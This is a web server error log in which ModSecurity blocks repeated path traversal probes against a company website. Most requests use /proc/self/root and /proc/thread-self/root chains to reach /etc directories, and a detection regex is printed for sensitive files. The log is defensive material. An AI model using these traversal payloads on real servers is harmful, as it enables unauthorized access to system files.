[Mon Mar 16 08:44:04.539296 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:38580] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftBP9ocpUE4ed4uDzU5QAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:44:18.622170 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:44242] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftEo6lpbStxTqkSktUegAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:44:26.111500 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:35506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftGv9ocpUE4ed4uDzU-gAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:44:49.751415 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:55742] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftMY6lpbStxTqkSktUmQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:44:54.311749 2026] [:error] [pid 21805:tid 140411548894976] [client 74.7.241.46:38756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftNrABkC4fWIHEf8HS-QAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:44:55.651428 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:38762] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftN_9ocpUE4ed4uDzVBQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:45:10.247528 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.241.46:38766] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftRo6lpbStxTqkSktUpwAAAlY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:45:21.075239 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.228.16:52534] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abftUZqj1wV0Si-OkefQOAAAAAA"]
[Mon Mar 16 08:45:42.630062 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:59390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftZdSswJuvopo3lOhG6gAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:45:48.184023 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:51720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftbNSswJuvopo3lOhG7wAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:45:59.237259 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.243.203:51730] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftdwlT9VtDQc7bgUyQIQAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:46:01.688971 2026] [:error] [pid 21946:tid 140411708356352] [client 74.7.243.203:59152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfteXbQATo66fKoS7wyYgAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:46:35.562250 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:59160] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftm_9ocpUE4ed4uDzVPAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:46:36.864484 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.243.203:40150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftnP9ocpUE4ed4uDzVPQAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:47:02.305985 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:40158] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftthXjF1vJNtV6CWrhMAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:47:06.576181 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:54044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abftuo6lpbStxTqkSktVJgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:47:40.803038 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.241.46:44254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abft3AlT9VtDQc7bgUyQYwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:47:53.251632 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.241.46:52446] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abft6XbQATo66fKoS7wymAAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:47:57.154391 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.244.31:52598] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abft7bABkC4fWIHEf8HTMAAAAEA"]
[Mon Mar 16 08:48:03.387335 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:37078] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abft8_9ocpUE4ed4uDzVWAAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:48:05.872535 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.241.46:53418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abft9Y6lpbStxTqkSktVLQAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:48:08.295407 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:53432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abft-LysWC90G-1nBrAtrQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:48:25.566631 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:35186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuCbABkC4fWIHEf8HTQwAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:48:32.315519 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.241.46:47492] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfuEHbQATo66fKoS7wyqQAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
